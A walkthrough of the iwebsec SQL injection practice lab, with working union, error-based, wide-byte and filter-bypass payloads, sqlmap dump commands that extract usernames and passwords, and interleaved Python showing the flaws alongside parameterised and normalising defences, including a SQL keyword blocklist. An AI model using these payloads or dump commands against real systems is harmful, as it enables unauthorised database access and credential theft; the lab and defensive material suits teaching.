Bypassing a WAF to dump a MySQL database: iwebsec practice notes - SQL injection vulnerabilities
Someone recommended this web platform to me and it seems well suited to beginners. I searched around and didn't find anyone who had written a writeup, so as a newcomer I'll tidy up my own solving process here.
SQL injection vulnerabilities
01 - Numeric injection
http://localhost:32774/sqli/01.php?id=1'
An error is reported:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
Guessed query:
WHERE id=$id LIMIT 0,1
Verify it
Find the number of columns
Find the displayed columns
Dump the databases
http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%20--+
Dump the tables
http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+
Dump the columns
http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema%20=database()%20and%20table_name=%27users%27)%20--+
Dump the data
http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,(select%20group_concat(concat(role,0x7e,username,0x3A,password,0x7e))%20from%20users)%20%20--+
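The guessed query above (WHERE id=$id LIMIT 0,1) pastes the request parameter straight into the SQL text, which is why a union can be appended. As an added example that is not part of the writeup or the lab's code, the following Python reproduces that pattern against a constructed in-memory SQLite table and puts the hardened form next to it: the id is validated as an integer and then bound as a parameter, so the driver never lets it become SQL syntax. The table layout (id, username, password, role), the row contents and the use of SQLite instead of MySQL are assumptions for the example.

```python
import sqlite3

# Constructed in-memory stand-in for the challenge's users table
# (assumption: columns id, username, password, role; SQLite rather than MySQL).
CONN = sqlite3.connect(":memory:")
CONN.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
INSERT INTO users VALUES (1, 'admin', 'constructed-admin-secret', 'admin');
INSERT INTO users VALUES (2, 'alice', 'constructed-user-pw', 'user');
""")


def lookup_unsafe(raw_id: str):
    """The pattern guessed for 01.php: the parameter is pasted into the SQL text,
    so the database executes whatever the client sent as part of the statement."""
    sql = f"SELECT id, username, role FROM users WHERE id={raw_id} LIMIT 0,1"
    return CONN.execute(sql).fetchall()


def lookup_safe(raw_id: str):
    """Hardened form: validate the type first, then bind the value as a parameter.
    The value travels separately from the statement and cannot change its structure."""
    user_id = int(raw_id)  # raises ValueError for anything that is not an integer
    sql = "SELECT id, username, role FROM users WHERE id=? LIMIT 0,1"
    return CONN.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    print(lookup_unsafe("1"))
    print(lookup_unsafe("-1 union select 1,2,3"))   # the union row comes back
    print(lookup_safe("1"))
    try:
        lookup_safe("-1 union select 1,2,3")
    except ValueError as exc:
        print("rejected:", exc)
```

The unsafe lookup with a negative id plus a union returns only the attacker-chosen row, which is exactly the "find the displayed columns" step; the safe lookup rejects the same input before any SQL is built.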
02 - String injection
http://localhost:32774/sqli/02.php?id=1' or '1=2--'
Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1' or '1=2--'' LIMIT 0,1' at line 1
Looking at the source, I noticed SET NAMES gbk and guessed wide-byte injection.
Try:
http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,3 --+
Dump the databases
http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
Dump the tables
http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+
Dump the data
http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) --+
Apart from the leading wide byte, which makes MySQL read it as a Chinese character and so gets past the check, everything else is the same as challenge 1.
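Why the %df byte defeats the escaping in challenges 02 and 06 is easier to see at the byte level. The following Python is an added example, not the lab's code or the author's: a constructed byte-oriented escaper (the behaviour of addslashes or of an escaper that does not know the connection charset) prefixes the quote with 0x5c, and the result is then decoded under the connection charset the way the SQL parser would see it. Under GBK the bytes 0xdf 0x5c form one two-byte character, so the backslash is swallowed and the quote survives unescaped; under a charset where 0xdf cannot absorb the backslash the quote stays escaped. Function names and the payload are assumptions for the example; the fix this illustrates is to make the escaper charset-aware (for PHP, mysqli_set_charset rather than a bare SET NAMES) or, better, to bind parameters.

```python
def addslashes(data: bytes) -> bytes:
    """Constructed byte-oriented escaper: puts a backslash before ' " and \\
    without any knowledge of multi-byte characters."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C):   # ' " \
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def count_unescaped_quotes(text: str) -> int:
    """Count single quotes not preceded by a backslash, i.e. quotes the SQL
    parser treats as string delimiters after the bytes have been decoded."""
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2          # a backslash escapes the next character
            continue
        if text[i] == "'":
            count += 1
        i += 1
    return count


def quote_survives(payload: bytes, charset: str) -> bool:
    """True if a quote in the payload still reaches the parser as a delimiter
    once the escaped bytes are decoded under the connection charset."""
    escaped = addslashes(payload)
    decoded = escaped.decode(charset, errors="replace")
    return count_unescaped_quotes(decoded) > 0


def describe(payload: bytes, charset: str) -> str:
    """Human-readable view of what the parser sees for a given charset."""
    escaped = addslashes(payload)
    return f"{charset}: {escaped!r} -> {escaped.decode(charset, errors='replace')!r}"


if __name__ == "__main__":
    payload = b"1\xdf'"   # the %df' prefix used in challenges 02 and 06
    for cs in ("gbk", "utf-8"):
        print(describe(payload, cs), "| quote survives:", quote_survives(payload, cs))
```

A plain `1'` is escaped correctly under either charset; only the wide-byte prefix combined with a GBK connection lets the quote through, which is the check a reviewer can run when a code base mixes SET NAMES with client-side escaping.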
03 - Boolean injection
http://localhost:32774/sqli/03.php?id=1 and 1=2 --+
Once I had confirmed a Boolean-based injection, I couldn't be bothered to write a script and just ran sqlmap.
Dump the databases
sqlmap -u http://localhost:32774/sqli/03.php?id=1 --current-db
Dump the tables
sqlmap -u http://localhost:32774/sqli/03.php?id=1 -D iwebsec --tables
Dump the columns
sqlmap -u http://localhost:32774/sqli/03.php?id=1 -D iwebsec -T users --columns
Dump the data
sqlmap -u http://localhost:32774/sqli/03.php?id=1 -D iwebsec -T users -C role,username,password --dump
04 - Sleep injection
My own script is really ugly, so I won't embarrass myself with it here.
Time-based blind injection: dump the databases
sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 --current-db
Dump the tables
sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 -D iwebsec --tables
Dump the columns
sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 -D iwebsec -T user --columns
Dump the data
sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 -D iwebsec -T user -C id,password,username --dump
05 - updatexml injection
The restrictions in this challenge weren't set up properly; the payloads from challenge 1 work here too.
But I'll still go through it the intended way:
and (updatexml(1,concat(0x7e,(select version()),0x7e),1))
Check first
http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select version()),0x7e),1))
The injection exists, and it is exploited through the updatexml function.
Dump the databases
http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1))
Dump the tables
http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select (select group_concat(table_name) from information_schema.tables where table_schema=database())),0x7e),1))
Dump the columns
http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select (select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')),0x7e),1))
Dump the data
http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select (select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)),0x7e),1))
06 - Wide-byte injection
The title tells you this is wide-byte injection, which overlaps with challenge 2, so I'll switch approach and run sqlmap through it.
What you need to know here is that running plain
sqlmap -u http://localhost:32774/sqli/06.php?id=1
won't find the injection; you need
sqlmap -u http://localhost:32774/sqli/06.php?id=1%df%27
or use tamper="unmagicquotes"
sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" --current-db
Dump the databases
sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" --current-db
Dump the tables
sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" -D iwebsec --tables
Dump the columns
sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" -D iwebsec -T users --columns
Dump the data
sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" -D iwebsec -T users -C role,username,password --dump
07 - Space filter bypass
From the challenge you can tell spaces are filtered; here I chose parentheses so that no spaces are needed between tokens.
http://localhost:32774/sqli/07.php?id=(0)or(1)=(1)
Find the displayed columns
http://localhost:32774/sqli/07.php?id=(0)%0aunion%0aselect(1),(2),(3)
Dump the databases
http://localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(schema_name)%0Afrom%0Ainformation_schema.schemata)
Dump the tables
localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(table_name)%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema=database())
Dump the columns
http://localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(column_name)%0Afrom%0Ainformation_schema.columns%0awhere%0atable_schema=database()and(table_name='users'))
Dump the data
http://localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(concat(role,0x7e,username,0x3A,password,0x7e))%0Afrom%0Ausers)
08 - Case filter bypass
After routine testing, the check turned out to be on select; as the challenge says, just changing the case of select is enough.
Displayed columns
Dump the databases
http://localhost:32774/sqli/08.php?id=1 union Select 1,2,group_concat(schema_name) from information_schema.schemata--+
Dump the tables
http://localhost:32774/sqli/08.php?id=1 union Select 1,2,(Select group_concat(table_name) from information_schema.tables where table_schema=database())--+
Dump the columns
http://localhost:32774/sqli/08.php?id=1 union Select 1,2,(Select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')--+
Dump the data
http://localhost:32774/sqli/08.php?id=1 union Select 1,2,(Select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)--+
09 - Double-keyword bypass
Confirm the injection exists
Found that the string select is filtered; the challenge says double writing is needed to bypass it, so try it:
http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,3--+
Why the bypass works
The filter runs only once: it matches the select in the middle of "se" + "select" + "lect" and replaces it with an empty string, and the remaining front and back pieces join up into select again, so the single check is bypassed.
Dump the databases
http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,group_concat(schema_name) from information_schema.schemata--+
Dump the tables
http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,(seselectlect group_concat(table_name) from information_schema.tables where table_schema=database())--+
Dump the columns
http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,(seselectlect group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')--+
Dump the data
http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,(seselectlect group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)--+
10 - Double URL-encoding bypass
From the challenge you can guess that the source calls urldecode on $id once, and during testing I also found select is filtered by the WAF, so all that is needed is to URL-encode the challenge 8 payloads twice.
Script
import urllib.parse

a = ""  # payload to encode, e.g. one of the "original statement" lines below
# Encode twice: the challenge calls urldecode() on $id once on top of the decoding the web server already does
print(urllib.parse.quote(urllib.parse.quote(a)))
I thought it would go like this,
but it turned out to be completely unnecessary: copying the challenge 8 statements verbatim works.
Still, out of respect for the challenge, let's bypass it with double URL encoding anyway.
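Challenges 08, 09 and 10 all beat the same kind of filter: a single case-sensitive pass that strips or matches the literal keyword in the raw parameter. As an added example that is neither the lab's code nor the author's script, the following Python puts a constructed one-pass filter next to a normalising check that URL-decodes until the value stops changing, lower-cases it and only then looks for keywords, and then runs that check over a few constructed access-log lines so it can double as a detection rule. The keyword list, the log lines and all function names are assumptions for the example.

```python
import re
from urllib.parse import unquote

# Assumed keyword list for the example; a real rule set would be broader.
KEYWORDS = ("select", "union", "updatexml", "sleep")


def naive_filter(value: str) -> str:
    """The kind of filter challenges 08 and 09 defeat: one case-sensitive pass
    that strips the literal keyword (constructed stand-in, not the lab's code)."""
    return value.replace("select", "")


def normalize(value: str) -> str:
    """Decode until stable (%2520 -> %20 -> space), then lower-case, so that the
    check sees the value the application will eventually act on."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value.lower()


def strip_until_stable(value: str) -> str:
    """Repeat keyword stripping until nothing changes, so 'seselectlect' collapses
    completely instead of leaving 'select' behind after one pass."""
    prev = None
    while prev != value:
        prev = value
        for kw in KEYWORDS:
            value = value.replace(kw, "")
    return value


def blocklist_hit(value: str):
    """Return the first keyword found in the normalised value, or None."""
    normalized = normalize(value)
    for kw in KEYWORDS:
        if kw in normalized:
            return kw
    return None


# Constructed access-log lines in common log format (not taken from the lab).
ACCESS_LOG = """\
127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli/08.php?id=1%20union%20Select%201,2,3 HTTP/1.1" 200 512
127.0.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/09.php?id=1%20union%20seselectlect%201,2,3 HTTP/1.1" 200 512
127.0.0.1 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/10.php?id=1%2520union%2520Select%25201%252C2%252C3 HTTP/1.1" 200 512
127.0.0.1 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/01.php?id=2 HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_requests(log_text: str):
    """Return (path, keyword) for every request whose normalised target hits the list."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group(1)
        kw = blocklist_hit(target)
        if kw:
            hits.append((target.split("?", 1)[0], kw))
    return hits


if __name__ == "__main__":
    print(naive_filter("1 union seselectlect 1,2,3"))   # one pass leaves 'select' behind
    print(naive_filter("1 union Select 1,2,3"))         # case-sensitive, so untouched
    print(normalize("1%2520union%2520Select%25201%252C2"))
    for path, kw in flag_requests(ACCESS_LOG):
        print(f"flagged {path}: {kw}")
```

Stripping until stable is shown only to make the one-pass weakness concrete; rejecting (or logging, as flag_requests does) is the safer reaction to a hit, and parameterised queries remain the fix that makes the keyword list irrelevant.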
Dump the databases
Original statement
1 union Select 1,2,group_concat(schema_name) from information_schema.schemata#
Encoded
1%2520union%2520Select%25201%252C2%252Cgroup_concat%2528schema_name%2529%2520from%2520information_schema.schemata%2523
Final
http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252Cgroup_concat%2528schema_name%2529%2520from%2520information_schema.schemata%2523
Dump the tables
Original statement
1 union Select 1,2,(Select group_concat(table_name) from information_schema.tables where table_schema=database())#
Encoded
1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528table_name%2529%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2529%2523
Final
http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528table_name%2529%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2529%2523
Dump the columns
Original statement
1 union Select 1,2,(Select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')#
Encoded
1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528column_name%2529%2520from%2520information_schema.columns%2520where%2520table_schema%2520%253Ddatabase%2528%2529%2520and%2520table_name%253D%2527users%2527%2529%2523
Final
http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528column_name%2529%2520from%2520information_schema.columns%2520where%2520table_schema%2520%253Ddatabase%2528%2529%2520and%2520table_name%253D%2527users%2527%2529%2523
Dump the data
Original statement
1 union Select 1,2,(Select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) #
Encoded
1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528concat%2528role%252C0x7e%252Cusername%252C0x3A%252Cpassword%252C0x7e%2529%2529%2520from%2520users%2529%2520%2523
Final
http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528concat%2528role%252C0x7e%252Cusername%252C0x3A%252Cpassword%252C0x7e%2529%2529%2520from%2520users%2529%2520%2523
11 - Hexadecimal bypass
Follow the normal steps first
Find the displayed columns
http://localhost:32774/sqli/11.php?id=1%20union%20select%201,2,3--+
Dump the databases
localhost:32774/sqli/11.php?id=1 union select 1,2,group_concat(schema_name) from information_schema.schemata--+
Dump the tables
localhost:32774/sqli/11.php?id=1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
The problem showed up when dumping the columns: quotes are filtered.
So I used the hexadecimal encoding of user to get around the restriction.
Dump the columns
http://localhost:32774/sqli/11.php?id=1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name=0x75736572)--+
Dump the data
http://localhost:32774/sqli/11.php?id=1 union select 1,2,(select group_concat(concat(id,0x7e,username,0x3A,password,0x7e)) from user) --+
12 - Equivalent function substitution filter bypass
A quick test shows the equals sign is filtered by the WAF, so the database-dump statement still works as normal:
http://localhost:32774/sqli/12.php?id=1 union select 1,2,group_concat(schema_name) from information_schema.schemata--+
Here, as the challenge says, I substitute a function equivalent to equals; I chose like, because without a percent sign a like clause behaves the same as equals.
Dump the tables
http://localhost:32774/sqli/12.php?id=1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema like database())--+
Dump the columns
http://localhost:32774/sqli/12.php?id=1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema like database() and table_name like 'users')--+
Dump the data
http://localhost:32774/sqli/12.php?id=1 union select 1,2,(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) --+
13 - Second-order injection
This one is actually quite simple; here is the flow in brief:
1. Register a user, entering a username, password and email.
2. Recover the password: entering an existing email returns the username and password.
So here's the catch: this is an injection challenge, and from an injection point of view the username is what should carry the payload into the query, which then executes through password recovery.
But since I'm lazy, I just went with the universal-password approach.
That way the query looks up admin rather than admin'#.
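The two-step flow above is the classic second-order shape: registration stores the username safely, and only the later password-recovery query trusts the stored value. As an added example that is not the lab's code, the following Python models both steps on a constructed in-memory SQLite table, with the vulnerable recovery query (username read back from the database and pasted into a second statement) next to the hardened one that binds it again. Because SQLite's comment token is `--` rather than MySQL's `#`, the registered username in this example ends in `'-- ` instead of `'#`; the table layout, row contents and function names are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the lab's users table (SQLite rather than MySQL).
CONN = sqlite3.connect(":memory:")
CONN.executescript("""
CREATE TABLE users (username TEXT, password TEXT, email TEXT);
INSERT INTO users VALUES ('admin', 'constructed-admin-secret', 'admin@example.invalid');
""")


def register(username: str, password: str, email: str) -> None:
    """Step 1 of the challenge. Registration itself is safe: the values are bound,
    so a username containing a quote is stored verbatim, quote and all."""
    CONN.execute("INSERT INTO users VALUES (?, ?, ?)", (username, password, email))


def recover_unsafe(email: str):
    """Step 2, vulnerable form: the username read back from the database is
    trusted and pasted into a second query, which is the second-order injection."""
    row = CONN.execute("SELECT username FROM users WHERE email=?", (email,)).fetchone()
    if row is None:
        return None
    sql = f"SELECT username, password FROM users WHERE username='{row[0]}'"
    return CONN.execute(sql).fetchall()


def recover_safe(email: str):
    """Hardened form: data coming back out of the database is still data and is
    bound as a parameter too, so the stored quote cannot close the string literal."""
    row = CONN.execute("SELECT username FROM users WHERE email=?", (email,)).fetchone()
    if row is None:
        return None
    return CONN.execute(
        "SELECT username, password FROM users WHERE username=?", (row[0],)
    ).fetchall()


if __name__ == "__main__":
    # SQLite comment token is '--'; MySQL would use '#' as in the writeup.
    register("admin'-- ", "constructed-attacker-pw", "attacker@example.invalid")
    print(recover_unsafe("attacker@example.invalid"))   # returns the admin row
    print(recover_safe("attacker@example.invalid"))     # returns only the attacker's own row
```

The lesson for review is that "escaped on the way in" does not mean "safe on the way out": every query that consumes a value, including values the application itself stored earlier, has to bind it.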
Summary